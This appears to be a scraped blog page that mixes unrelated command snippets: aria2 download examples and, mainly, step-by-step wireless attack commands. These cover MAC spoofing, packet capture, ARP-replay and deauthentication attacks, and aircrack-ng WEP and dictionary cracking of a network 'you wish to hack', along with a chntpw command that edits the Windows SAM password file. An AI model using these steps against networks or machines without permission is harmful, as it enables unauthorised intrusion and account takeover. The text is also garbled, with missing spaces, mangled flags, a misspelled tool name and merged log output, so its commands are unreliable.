In this post i'll provide you the way to install BackTrack into USB....
(By :- CODE MOBILE <codemobile@yahoo.com>)
Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.
ifconfig
airmon-ng
airmon-ngstop [Wi-Fi Card name(without the quotes)]
macchanger–mac [Desired MAC address] [Wi-Fi card name]
airmon-ngstart [Wi-Fi Card name]
airodump-ng[Wi-Fi card name]
airodump-ng–c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID][Wi-Fi Card name]
airreplay-ng-1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)][Wi-Fi card name]
aircrack-ng–n 64 –b [BSSID] [Filename without the extension]
aircrack-ng–n [BIT LEVEL] –b [BSSID] [Filename without extension]
aircrack-ng–n 32 –b [BSSID] [Filename without the extension]
aircrack-ng–n 128 –b [BSSID] [Filename without the extension] etc. etc.
DOWNLOAD Aria2 for All Linux Distributions
$aria2c http://somehost.com/file.zip
$aria2c http://somehost.com/file.zip ftp://otherhost.com/pub/file.zip
$time curl -OLftp://ftp.ibiblio.org:21//pub/linux/distributions/annvix/releases/ISO/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed100 200M 100 200M 0 0 108k 0 0:31:27 0:31:27--:--:-- 104kcurl:(28) FTP response timeoutcurl-OL 0.57s user 2.04s system 0% cpu 31:27.27 total
$time aria2cftp://ftp.ibiblio.org:21//pub/linux/distributions/annvix/releases/ISO/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2http://gd.tuwien.ac.at/opsys/linux/annvix/releases/ISO/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2http://ftp.cc.uoc.gr/mirrors/linux/annvix/releases/ISO/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2*** Download Progress Summary as of Thu May 1317:28:12 2010 ***=============================================================================================[#1SIZE:88.2MiB/200.4MiB(43%) CN:5 SPD:2.0MiBs ETA:55s]FILE:/home/user/tmp/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2---------------------------------------------------------------------------------------------*** Download Progress Summary as of Thu May 1317:29:12 2010 ***=============================================================================================[#1SIZE:167.6MiB/200.4MiB(83%) CN:5 SPD:559.9KiBs ETA:59s]FILE:/home/user/tmp/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2----------------------------------------------------------------------------------------------[#1SIZE:200.3MiB/200.4MiB(99%) CN:5 SPD:192.3KiBs]2010-05-1317:29:57.277148 NOTICE - Download complete: /home/user/tmp/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2DownloadResults:gid|stat|avgspeed |path/URI===+====+===========+===========================================================1| OK| 1.2MiB/s|/home/user/tmp/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2StatusLegend:(OK):download completed.aria2c 0.53s user 4.62s system 3% cpu 2:45.08 total
$md5sum o/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2a7d1e84533a27daf8fe794256ca1f928 o/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2a7d1e84533a27daf8fe794256ca1f928 annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2%ls -al o/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2-rw-r--r--1 user user 210219877 May 13 17:29annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2-rw-r--r--1 user user 210219877 May 13 17:25o/annvix-netinstall-x86_64-3.0-RELEASE-r2.iso.tar.bz2
$aria2c -Z http://somehost.com/file.zip linuxdistro.torrent
$ aria2c http://example.org/mylinux.iso
$ aria2c http://a/f.iso ftp://b/f.iso
$ aria2c http://example.org/mylinux.torrent
$ aria2c 'magnet:?xt=urn:btih:248D0A1CD08284299D
E78D5C1ED359BB46717D8C'
$ aria2c http://example.org/mylinux.metalink
$ aria2c -i uris.txt
chntpw -i /mnt/hda1/Windows/system32/config/SAMYou may have to change the “hda1″ to something else such as hdb1,sda2, sdb3.
airodump-ng -c 6 bssid 00:0F:CC:7D:5A:74 -w data mon0(-c 6 switch would capture data on channel 6, bssid 00:0F:CC:7D:5A:74 is the MAC address of our target access point, -w data specifies that we want to save captured packets into a file called "data" in the current directory, mon0 is our wireless network adapter)
aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0
-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface
aircrack-ng data*.cap(assuming your capture file is called data...cap, and is located in the same directory)
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client
(where MAC_IP is the MAC address of the access point, and MAC_Client is the MAC address of an associated client).
aircrack-ng -w dictionary_file capture_fileNotes: